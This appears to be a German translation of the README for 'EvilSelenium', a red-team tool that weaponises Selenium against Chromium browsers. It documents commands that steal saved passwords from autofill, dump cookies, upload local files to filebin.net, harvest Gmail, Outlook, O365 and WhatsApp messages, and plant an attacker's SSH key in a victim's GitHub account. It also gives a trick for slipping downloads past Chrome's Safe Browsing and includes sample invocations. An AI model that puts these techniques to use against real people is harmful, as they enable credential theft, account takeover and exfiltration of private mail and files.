
Bewaffnet Selenium, um Credential-Diebstahl, Cookie-Dumping, E-Mail-Exfiltration und Dateiextraktion aus Chromium-Browsern für Red-Team-Operationen zu automatisieren.
EvilSelenium ist ein neues Projekt, das Selenium bewaffnet, um Chromium-basierte Browser zu missbrauchen. Die aktuellen Funktionen sind:
Oder erweitern Sie die vorhandene Funktionalität nach Ihren Bedürfnissen (z. B. Dateien aus dem GDrive/OneDrive des Benutzers herunterladen).
Wenn dieses Tool ausgeführt wird, werden alle vorhandenen Browserprozesse beendet, um mit dem Benutzerprofil des Browsers ausgeführt werden zu können, das die Passwörter und aktiven Sitzungen enthält.
Ich habe dieses Tool in etwa einer Woche erstellt und nicht so viele Tests durchgeführt, wie ich sollte, daher kann es einige Fehler geben.
Selenium-Module sind nicht immer stabil. Aufgrund der ständigen Änderungen an Websites können einige Module gelegentlich brechen. Ich werde mein Bestes tun, um die bestehenden Module zu warten, damit sie wie beabsichtigt funktionieren, aber Sie wurden gewarnt.
EvilSelenium.exe /?
/help - Zeigt dieses Hilfemenü an.
SETUP:
/install - Installiert chromedriver und Selenium webdriver. Einmal ausführen.
GLOBAL: (wird mit jedem Befehl akzeptiert)
/browserdir [appdata_local_routing] - Benutzerdefinierten Browser verwenden. Die Eingabe sollte die Route innerhalb des %appdatalocal%-Verzeichnisses sein (z.B. "Microsoft\Edge")
RECON:
/enumsavedsites [out_path] - Überprüft, welche Websites Passwörter gespeichert haben (via Screenshot(s)).
/screenshot [website] [out_path] - Erstellt einen Screenshot einer angegebenen Webseite.
CREDENTIALS:
/autorun - Extrahiert gespeicherte Anmeldeinformationen von gängigen Websites.
/dynamicid [login_page] [username_id] [password_id] - Extrahiert gespeicherte Anmeldeinformationen von einer Website, indem die ID des Benutzernamensfelds und die ID des Passwortfelds angegeben werden.
/dynamicname [login_page] [username_name] [password_name] - Extrahiert gespeicherte Anmeldeinformationen von einer Website, indem der Name-Wert des Benutzernamensfelds und der Name-Wert des Passwortfelds angegeben werden.
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - Extrahiert gespeicherte Anmeldeinformationen von einer Website, indem die Name-Werte des Benutzernamensfelds und des Passwortfelds sowie deren Positionen angegeben werden.
COOKIES:
/cookies [website] - Greift Cookies für eine angegebene Website ab.
MODULES:
/download [file_url] [seconds] - Lädt eine Datei herunter und gibt die Wartezeit für den Download an. Dateierweiterungen sollten nicht ausführbar sein.
/exfil [local_file] [seconds] - Lädt eine Datei auf filebin.net hoch und gibt den Download-Link aus.
/gmail [out_path] [num_of_emails] - Ruft E-Mails von mail.google.com ab, wenn der Benutzer authentifiziert ist. Maximal 50 E-Mails.
/outlook [out_path] [num_of_emails] - Ruft E-Mails von Outlook ab, wenn der Benutzer authentifiziert ist.
/o365 [out_path] [num_of_emails] - Ruft E-Mails von O365 Outlook ab, wenn der Benutzer authentifiziert ist.
/github [key] - Fügt Ihren SSH-Schlüssel zu GitHub hinzu, wenn der Benutzer authentifiziert ist.
/whatsapp [out_path] - Ruft WhatsApp-Nachrichten ab, wenn der Benutzer authentifiziert ist (BETA).
Der Befehl /install lädt den Chrome Driver und Selenium WebDriver herunter, die die notwendigen Voraussetzungen sind. EvilSelenium funktioniert mit Chrome-Versionen 100-90.
Getestet auf Windows 10, Chrome v97 & v90.
EvilSelenium.exe /install
Standardmäßig versucht EvilSelenium, den User Data-Ordner von Google Chrome zum Abrufen von Daten zu verwenden, aber andere Chromium-basierte Browser werden ebenfalls unterstützt.
Um andere Chrome-basierte Browser zu verwenden, sollten Sie das /browserdir mit der Browser-Route im %localappdata%-Verzeichnis angeben.
Hier sind Beispiele für einige gängige Browser (sollten jedem CLI-Befehl hinzugefügt werden):
/browserdir BraveSoftware\Brave-Browser/browserdir Microsoft\Edge/browserdir Vivaldi/enumsavedsites - Dies erstellt Screenshots von chrome://settings/passwords
/screenshot - Screenshot einer beliebigen Website. Wenn der Benutzer bei der Website authentifiziert ist, erhalten Sie authentifizierte Screenshots :).
WICHTIG: Das Modul für Anmeldeinformationen wird COOKIES LÖSCHEN, um Anmeldeinformationen aus dem Autofill zu stehlen. Idealerweise sollten Sie das Modul für Anmeldeinformationen am Ende verwenden, wenn Sie Cookies exportieren möchten.
/autorun - Vorgefertigte Vorlagen für gängige Websites. Ich werde weiterhin weitere hinzufügen.
/dynamicid - Geben Sie die Login-URL zusammen mit der ID des Benutzernameneingabefelds und der ID des Passwortfelds an. Dies entspricht document.getElementById().
/dynamicname - Wenn die Felder keine IDs haben, geben Sie die name-Werte der Felder an. Es wird der erste Index der name-Werte ausgewählt. Dies entspricht document.getElementsByName()[0].value.
/dynamicname2 - Geben Sie die name-Werte der Felder zusammen mit ihrer Indexposition an. Dies entspricht document.getElementsByName()[x].value, wobei x die angegebene Position ist.
/cookies - Gibt Cookies von der angegebenen Website aus.
Dies sind zusätzliche Module, die ich erstellt habe, um zu zeigen, welche Aktionen Sie mit Selenium durchführen können.
/download - Lädt eine Datei herunter und gibt die Wartezeit für den Download an. Vor dem Herunterladen sollte eine nicht ausführbare Dateierweiterung an die Datei angehängt werden, um die Safebrowsing-Abfrage von Chrome zu vermeiden.
/exfil - Lädt eine Datei auf filebin.net hoch und gibt die Wartezeit für den Abschluss des Uploads an. Sobald der Upload abgeschlossen ist, wird der Download-Link der Datei ausgegeben.
/gmail - Ruft E-Mails von mail.google.com ab, wenn der Benutzer authentifiziert ist. Maximal 50 E-Mails.
/outlook - Ruft E-Mails von Outlook ab, wenn der Benutzer authentifiziert ist.
/o365 - Ruft E-Mails von O365 Outlook ab, wenn der Benutzer authentifiziert ist.
/github - Fügt Ihren SSH-Schlüssel zu GitHub hinzu, wenn der Benutzer authentifiziert ist.
/whatsapp - Ruft WhatsApp-Nachrichten ab, wenn der Benutzer authentifiziert ist (BETA).
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads
EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password
EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password
